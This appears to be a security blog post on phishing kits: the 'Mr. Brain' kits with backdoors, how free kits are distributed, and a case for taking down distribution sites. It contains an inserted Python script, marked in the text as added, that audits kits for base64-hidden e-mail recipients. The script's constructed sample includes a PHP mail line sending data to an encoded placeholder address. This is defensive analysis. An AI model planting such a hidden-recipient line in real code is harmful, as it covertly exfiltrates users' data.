If you follow phishing and anti-phishing at all, you probably know that phishers use phishing kits to create phishing sites. A kit is simply an archive (zip, tar, rar) of all of the files needed to make the phishing site.
The good and the bad thing about phishers is that most of them are not very sophisticated. In most cases the phishers are not very technical and therefore do not have the skills to create a phishing kit. Instead, they generally use free kits provided by other cyber criminals. It’s the authors of the kits who are a bit more sophisticated and who ultimately drive a large portion of the phishing sites that we see.
Earlier this year, Netcraft blogged about certain Mr. Brain phishing kits that contained backdoors. These backdoors cause an email to be sent to the kit authors whenever a victim provides their information to a phishing site. What has not been talked about much is how ‘Mr. Brain’ has continually updated his/their phishing kits and has been distributing them on one site after another. Lately, they’re being advertised in underground IRC forums:
At my last count, Mr. Brain kits have been distributed over at least 10 sites in the past year alone.
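For anyone triaging a recovered kit, the backdoor behaviour described above suggests a simple check: list every e-mail recipient in the archive and see which ones appear only in encoded form. The Python below is an added example, not code from this post or from Netcraft; it assumes a zip kit and a recipient stored as a base64 string literal (the post does not say how the addresses are concealed), and the function names and sample kit are constructed for illustration.

```python
import base64, binascii, io, re, zipfile

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # candidate base64 string literals
TEXT_EXT = (".php", ".html", ".htm", ".js", ".txt")

def addresses_in(text):
    """Return {address: 'plain' | 'base64'} for every address found in text."""
    found = {a.lower(): "plain" for a in EMAIL_RE.findall(text)}
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue                      # not valid base64 text, ignore
        for a in EMAIL_RE.findall(decoded):
            found.setdefault(a.lower(), "base64")
    return found

def audit_kit(zip_bytes):
    """Map each address to [(file, how_stored)]; files are read in memory, never extracted or run."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as kit:
        for name in kit.namelist():
            if name.lower().endswith(TEXT_EXT):
                text = kit.read(name).decode("latin-1")
                for addr, how in addresses_in(text).items():
                    report.setdefault(addr, []).append((name, how))
    return report

def hidden_recipients(report):
    """Addresses that only ever appear encoded: candidates for a kit author's backdoor."""
    return sorted(a for a, hits in report.items() if all(h == "base64" for _, h in hits))

def build_sample_kit():
    """Constructed sample (assumption): one visible recipient, one base64-encoded one."""
    enc = base64.b64encode(b"author@example.net").decode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("login.php", '<?php $to = "user@example.com"; mail($to, "r", $d); ?>')
        z.writestr("include/config.php", f'<?php mail(base64_decode("{enc}"), "r", $d); ?>')
    return buf.getvalue()

if __name__ == "__main__":
    report = audit_kit(build_sample_kit())
    for addr in hidden_recipients(report):
        print("encoded recipient:", addr, report[addr])
```

An address that shows up in several unrelated kits only in encoded form is a useful pivot for linking those kits to one author.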
Mr. Brain is not alone in distributing free phishing kits though. Others often use free webhosting at sites like by.ru, 100webspace.net, and others to host their scams. While there are plenty of free and paid services to detect and shut down phishing sites themselves, it seems like many of the phish kit distribution sites stay up for long periods of time. For example, the following phish kit distribution site has been up for about 18 months now:
Because so many of the phishing sites we see are the result of ‘ankle-biters’ using free phish kits, going after the phish kit distribution sites themselves can have a positive impact. Barring a significant increase in arrests, we can’t make phishing go away, but if we aggressively go after these bottom feeders, we will be able to see who the real bad guys are and get rid of the noise. One way to do that is to stop allowing free tools like phish kits to be so easy to find.